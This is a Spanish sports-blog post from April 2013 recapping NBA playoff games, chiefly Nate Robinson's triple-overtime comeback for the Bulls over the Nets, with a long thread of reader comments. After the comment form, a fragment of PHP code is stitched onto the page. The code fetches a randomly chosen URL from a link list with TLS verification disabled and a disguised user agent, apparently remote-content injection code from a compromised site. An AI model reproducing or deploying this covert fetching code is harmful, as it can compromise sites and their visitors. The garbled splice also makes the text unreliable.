La crónica: Expediente Nate

28 de April de 2013 por MagicJohnson32

Una joya. Un regalo. Un tesoro con 3 prórrogas y 4 horas de duración, 276 puntos anotados y 7 técnicas señaladas. Una maravilla. Un prodigio en forma de cuarto partido de la eliminatoria de primera ronda entre Nets y Bulls, que tras lo sucedido anoche (134-142) está 3-1 para Chicago. Y lo sucedido anoche merece mucho más que estas líneas. Lo de anoche merece un poema épico, porque sólo así se alcanzaría a relatar de una manera digna lo que como espectadores pudimos disfrutar, uno de esos momentos mágicos en los que alguien decide pegarle una patada al orden de las cosas. Nos acordamos entonces de que aún poseemos la capacidad de sorprendernos, de trasladarnos a la infancia para mirarlo todo con ojos nuevos. Así es este juego que siempre logrará encontrar la manera de maravillarnos.

nate

Incluso antes de que se produjese el milagro, el partido estaba resultando sencillamente hermoso. Bulls y Nets se habían liberado de los corsés y, por una vez, impusieron el ataque a las defensas. Así, en el intercambio de golpes, los Nets tienen mucha más dinamita y, liderados por Deron Williams y Brook Lopez, parecían tener el partido sentenciado cuando a 3 minutos para el final se imponían por 14 puntos. Y entonces Nate Robinson entró en combustión, y con él se encendió el United Center. En ataques a cada cual más eléctrico y kamikaze, Robinson nos demostraba aquello de que “impossible is nothing”, con sus correspondientes imaginativas celebraciones. 23 puntazos suyos en ese último cuarto para triturar la desventaja, a punto de alcanzar el récord de la franquicia en manos de un tal Michael Jordan, que vibró con la remontada de los suyos para forzar la prórroga. La primera parte del Clippers@Grizzlies se iba a ir al carajo porque, tras ese 4º cuarto indescriptible, llegaron tres prórrogas con más tensión que otra cosa, exceptuando la clase y clarividencia de Joe Johnson para mantener a su equipo con vida ante tal chaparrón anímico. Al final todo caería por su propio peso. Los Nets perdieron su eficacia mientras que el inmenso corazón de Nate se contagiaba. El pequeñín terminaría expulsado pero su pulso lo heredaba Noah, también expulsado poco después para que entonces surgiese Mohammed, y así sucesivamente. Mientras, la tragedia de los Nets quedaba reflejada en el rendimiento de Deron Williams, extraordinario hasta esos últimos 4 minutos fatídicos, devorado después por el fuego Robinson y perdido completamente en los tiempos extra. Trabajo tienen los Nets para recuperarse de una como ésta (134-142). Los 34 puntos de Robinson, 32-10 de Deron, 26-11-4 de Lopez, 18-14 de Hinrich, 21-8 de Boozer o los 15-13-4 de Noah son algunas de las estadísticas que dejó el encuentro, pero como decíamos antes, ni estas líneas y mucho menos un box score hacen justicia al enorme partido que se vio anoche en Chicago, así que os rogamos que hagáis lo posible por haceros con el vídeo y lo disfrutéis. Imprescindible.

marcTras lo visto en el United Center, cualquier cosa nos iba a saber a poco. Sin embargo, el despliegue de los Grizzlies ante los Clippers fue toda una declaración de intenciones digna de ver. Memphis ahogó la creación de juego -es decir, a Chris Paul- y se impuso de manera contundente en la pintura, donde la diferencia en el rebote se demostró de nuevo decisiva: 28-45 para los Grizzlies en esta ocasión. Marc Gasol selló la zona y junto a Zach Randolph lideró una embestida que tumbó a los angelinos. 48 puntos, 21 rebotes, 6 asistencias y 4 tapones sumaron entre ambos. Enfrente, Griffin fue el único Clipper que atrapó más de 3 rebotes (logró 19 puntos y 10 capturas) y Chris Paul anotó 19 puntos pero se quedó en 6 asistencias, claramente superado por Conley (15 puntos, 13 asistencias). Los Grizzlies se impusieron a lo largo de todo el encuentro, salvo en el segundo cuarto, y acabaron infligiendo un duro golpe a los Clippers (83-104) para poner el 2-2 en una serie que va ganando interés.

Russell Westbrook no se había perdido ningún partido de los Thunder hasta ayer. Por primera vez, Kevin Durant saltaba a la cancha sin su compañero de fatigas, consciente de que era él y sólo él quien tenía que llevar a su equipo lo más lejos posible. En 12 minutos ya había demostrado que está perfectamente preparado. Al empezar el segundo cuarto, Durant había anotado ya 17 puntos y los Thunder ganaban por 26 puntos a unos estupefactos Rockets, que ni podían entender lo que les estaba pasando. A la media parte, la ventaja se mantenía por encima de los 15 puntos y Durant ya había llegado a los 27. Hizo falta el descanso y una probable sesión psicológica de Kevin McHale, para que Harden y compañía se pusieran a jugar y, sobre todo, a defender. Francisco García maniató a Durant, los Thunder se quedaron en 14 puntos y la ventaja se redujo a los 4. El problema que tienen los rivales de los Thunder en los finales apretados es que Durant suele jugar con el otro equipo. Con Delfino en plan Nate Robinson, los Rockets llegaron a ponerse por delante tras triple de un Francisco García que volvía a los Playoffs después de 7 años pero Kevin Durant enchufó un triple con toda la intriga y la fortuna del mundo a falta de  41 segundos que devolvía la ventaja a los suyos. Una pérdida de James Harden ante Derek Fisher (¿quién si no?) finiquitaba el partido (104-101) y deja la serie vista para sentencia.

En Atlanta, los Hawks redescubrieron al fin su gusto por la competitividad. Liderados por un inconmesurable Al Horford, controlaron desde el primer minuto a los Pacers y les proporcionaron una severa derrota, cimentada en una fenomenal primera parte. George Hill y Lance Stephenson estuvieron horribles y los guards de los Pacers acumularon un 2 de 25 en tiros, mientras que Horford y Smith se impusieron por dentro a sus pares y cuando los Hawks dominan la pintura son un equipo totalmente diferente (69-90). Veremos si esta inyección de moral les dura para empatar la serie y generar dudas a los Pacers.

kd rocketsPREMIOS

MVP: Mucho que destacar. Los 41 puntos y 14 rebotes de Kevin Durant, marca que sólo otros 5 jugadores han podido lograr en un partido de Playoffs a domicilio, la gran actuación de Marc Gasol a ambos lados de la cancha (24-13-4 y 3 tapones), los 26 puntos y 16 rebotes de Al Horford y, cómo no, el último cuarto histórico de Nate Robinson.

Rookie: No era día para novatos. En todo caso, nos quedamos con Patrick Beverley, titular de nuevo con los Rockets y que logró 6 puntos, 3 asistencias, 2 rebotes, 1 tapón y un +9 durante sus 22 minutos en cancha.

Sorpresa: En los dos partidos anteriores de la eliminatoria, Francisco García anotó un total de 8 puntos. Anoche metió 18, a los que sumó 5 rebotes, 3 tapones y una defensa excelente sobre Durant para hacer posible la remontada de los Rockets, aunque al final KD se saliese con la suya.

Decepción: 1 de 8 de George Hill, 1 de 7 de Lance Stephenson, 0 de 5 de DJ Augustin, 0 de 4 de Orlando Johnson… los exteriores de los Pacers completaron una de las peores actuaciones colectivas que recordamos.

Esfuerzo en vano: Hasta que irrumpió Nate, Deron Williams venía jugando un partidazo. De hecho, acabó el partido con 32 puntos y 10 asistencias. James Harden también llegó a los 30 puntos y además, capturó 8 rebotes y repartió 6 asistencias.

VÍDEO RESUMEN

Imágenes | AP Photos / Getty Images

Comenta

45 comentarios a esta entrada

  1. Txusma dice:
    #1

    Os habéis quedado sin palabras, eh…? 😀

    Qué grande, Nate! Pero que grande! Que gran fichaje hizo el GM de los Bulls…

      Citar

  2. Denise dice:
    #2

    Boston ganando de 19 a NY al descanso. Los neoyorquinos acusando la falta de acierto de Carmelo (3-15 en tiros de momento) y la baja de JR Smith. Este es el handicap que le veo a NY a la hora de derrotar en una serie a Miami, si Lebron falla, ahí están Wade, Bosh o una batería de tiradores como Chalmers, Miller, Battier, ó Allen. En cambio, en NY, si Melo ó JR Smith no están acertado o son bajas, no hay nadie que pueda coger las riendas y echarse el equipo a las espaldas. El que más es Raymond Felton, pero es esa clase de jugador que nunca sabes si pasará desapercibido o hará el partido de su vida.
    El juego de Boston se está basando en la colectividad y en la solidaridad entre sus jugadores. Como dato, 13 asistencias hasta ahora para Boston por solo 5 de NY

      Citar

  3. Denise dice:
    #3

    Se acerca NY, a 6 puntos se han puesto. Y Felton está empezando a aparecer para echarle una mano a Melo, que al final acabará con 40 puntos, pero con unos porcentajes horribles.

      Citar

  4. Denise dice:
    #4

    Denise:
    El que más es Raymond Felton, pero es esa clase de jugador que nunca sabes si pasará desapercibido o hará el partido de su vida.

    Wow…Raymond Felton, vaya 3º cuarto. Liderando la remontada de NY, lleva como 16 de los últimos 22 puntos de NY. Crack!!

      Citar

  5. Denise dice:
    #5

    El BOS-NYK debe ser uno de los partidos de la historia donde los pivots menos están tirando. Joder, meter balones dentro y juagrosla, sobre todo Garnett, que es el que mas calidad tiene bajo aros y apenas está tirando.

      Citar

  6. Denise dice:
    #6

    Fo, vaya partidazo que se va a resolver en los instantes finales. Melo el del blog, joder, como no estas viendolo y comentandolo por aqui?. Me habeis dejado solo, capullos.

      Citar

  7. MagicJohnson32 dice:
    #7

    Que nadie le deje sus zapatillas a Melo, porque se las tirará xD

      Citar

  8. Denise dice:
    #8

    Un tio como Garnett debe asumir mas responsabilidad, muchas veces criticamos a Gasol, pero este está dejandol todos los marrones a Pierce y a Green, este ultimo, el mejor de los Celtics en mi opinion

      Citar

  9. MagicJohnson32 dice:
    #9

    Es que las últimas posesiones de los Celtics son penosas. Tiene pinta de que esto se lo llevan los Knicks.

      Citar

  10. Denise dice:
    #10

    Felton!!! para poner a Knicks por delante. Venga, un buen rosco 4-0 para los Celtics!! Go NY!

      Citar

  11. rumbero dice:
    #11

    Pero que drama de segundas partes que estan haciendo los Celtics en esta serie. Terribles
    Veremos como acaba

      Citar

  12. Denise dice:
    #12

    Ahora si, aparece Garnett cuando mas quema la bola

      Citar

  13. MagicJohnson32 dice:
    #13

    Lo de Melo es para sentarlo un rato.

      Citar

  14. MagicJohnson32 dice:
    #14

    Venga, a ver si hoy llegamos a las cuatro prórrogas, jeje.

      Citar

  15. Jose Luis dice:
    #15

    Hasta los huevos de las isolations para Anthony…. por dios que aburrido y que fallón.

      Citar

  16. Denise dice:
    #16

    MagicJohnson32:
    Lo de Melo es para sentarlo un rato.

    pues si, pero es que si no tira él…ya digo, los Knicks salvo Melo, Felton y JR que no está hoy, no tiene nadie para darle el balón y que asuma responsabilidades en un momento clave. Un triple abierto de Novak quizás, pero tiene alguien que cocinarle la jugada.

      Citar

  17. Denise dice:
    #17

    Pero mamones, no os vayais a la prorroga que he quedado y tengo que irme a las 10!!!

      Citar

  18. Jose Luis dice:
    #18

    A mi me ha sorprendido lo del carajo… pensaba que la habría escrito Simón o Esteban, y me sorprendió que el auto fuera Magic 😀

      Citar

  19. Jose Luis dice:
    #19

    PIEEEEERCEEEEEEE

      Citar

  20. Jose Luis dice:
    #20

    Amnesty Melo

      Citar

  21. Jose Luis dice:
    #21

    Keeeeevinnnnn Gaaaaaarneeeeett!

      Citar

  22. Jose Luis dice:
    #22

    Que tirito de Jeff Green…

    Jason Terryyyyyyyyy THE JET!!

      Citar

  23. Jose Luis dice:
    #23

    Uh que bien Melo ahora.

      Citar

  24. Jose Luis dice:
    #24

    OHHHHH JASON TERRY BIENVENIDO A LOS CELTICS!

      Citar

  25. rumbero dice:
    #25

    Terry apareciendo. A buenas horas my friend!

      Citar

  26. Jose Luis dice:
    #26

    90-93, bola Knicks, Time Out Woodson. 28,3 por jugar

      Citar

  27. MagicJohnson32 dice:
    #27

    Jose Luis:
    A mi me ha sorprendido lo del carajo… pensaba que la habría escrito Simón o Esteban, y me sorprendió que el auto fuera Magic :D

    Jaja, en realidad fue una crónica conjunta, y concretamente la frase del “carajo” es de Deer 😉

      Citar

  28. Jose Luis dice:
    #28

    AMNESTY MELO!

      Citar

  29. Denise dice:
    #29

    Jose Luis:
    AMNESTY MELO!

    jajaj, tu amnistías a Melo y yo le hago un Buy-Out a Lala Vasques.

      Citar

  30. Denise dice:
    #30

    Dadle balones a Novak!! Novak is the man!!

      Citar

  31. Jose Luis dice:
    #31

    Muy fan de la Totalmente Clutch bandeja final de Jason Terry xD

      Citar

  32. MagicJohnson32 dice:
    #32

    Jose Luis:
    AMNESTY MELO!

    35 tiros de campo y 20 tiros libres del colega.

      Citar

  33. Denise dice:
    #33

    Nada, no va a haber rosco, los Celtics van a ganar este, con lo que acertaré mi pronostico de 4-1 que les puse.

      Citar

  34. Jose Luis dice:
    #34

    Denise:
    Dadle balones a Novak!! Novak is the man!!

    Estaba claro, meter a Novak para que igual se la tire Melo xD

      Citar

  35. Denise dice:
    #35

    Al final, el MVP ha sido Terry, que se ha tocado los hueveciilos durante 48 minutos y ha aparecido en la prorroga.

      Citar

  36. MagicJohnson32 dice:
    #36

    Denise:
    Al final, el MVP ha sido Terry, que se ha tocado los hueveciilos durante 48 minutos y ha aparecido en la prorroga.

    Se ha tocado los huevecillos durante seis meses, pero sí, ha aparecido.

      Citar

  37. rumbero dice:
    #37

    Denise:
    Al final, el MVP ha sido Terry, que se ha tocado los hueveciilos durante 48 minutos y ha aparecido en la prorroga.

    Más bien durante 85 partidos. Una sombra del que ejecutó a Miami no hace tanto

      Citar

  38. Denise dice:
    #38

    Bueno, me voy pero dejará mis siempre acertados pronósticos para los 3 partidos de hoy:

    Van a ganar Miami, Spurs y Denver con Javale McGee destrozando la pintura de los Warriors.

    El futuro está escrito y me ha hablado. Alé. Hasta mañana.

      Citar

  39. MagicJohnson32 dice:
    #39

    Denise:
    Bueno, me voy pero dejará mis siempre acertados pronósticos para los 3 partidos de hoy:

    Van a ganar Miami, Spurs y Denver con Javale McGee destrozando la pintura de los Warriors.

    El futuro está escrito y me ha hablado. Alé. Hasta mañana.

    ¿Y no te ha dicho el número del Euromillones? Vaya, hombre…

      Citar

  40. rumbero dice:
    #40

    Barrida de Miami y a descansar. Muy sobrados contra estos Bucks.
    A ver que contrato se atreve a pedir Jennings después se su lamentable serie que por lo visto tampoco pronosticó muy bien

      Citar

  41. Rulax dice:
    #41

    alguien sabe donde podria encontrar el bulls-nets para verlo?? gracias

      Citar

  42. Denise dice:
    #42

    Rulax:
    alguien sabe donde podria encontrar el bulls-nets para verlo?? gracias

    Rojadirecta o la pagina que me sugirió una vez José Luis y va perfecta.
    http://eventosendirecto.blogspot.com.es/

      Citar

  43. rumbero dice:
    #43

    Rulax:
    alguien sabe donde podria encontrar el bulls-nets para verlo?? gracias

    http://www.zona131.com/?p=343721
    Ya verás que está por partes. A veces tarda un poco en cargar, pero suele funcionar bien.
    Lo bueno bueno de verdad empieza en el último cuarto 😉

      Citar

  44. Rulax dice:
    #44

    rumbero: http://www.zona131.com/?p=343721
    Ya verás que está por partes. A veces tarda un poco en cargar, pero suele funcionar bien.
    Lo bueno bueno de verdad empieza en el último cuarto

    Muxisimas gracias!!! 😉

      Citar

  45. Denise dice:
    #45

    A

    rumbero: http://www.zona131.com/?p=343721
    Ya verás que está por partes. A veces tarda un poco en cargar, pero suele funcionar bien.
    Lo bueno bueno de verdad empieza en el último cuarto

    Ah, que queria ver el Bulls-Nets de los 140 y pico puntos…yo pensaba que quería ver el Bulls vs Nets de esta noche, el 5º de la serie..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>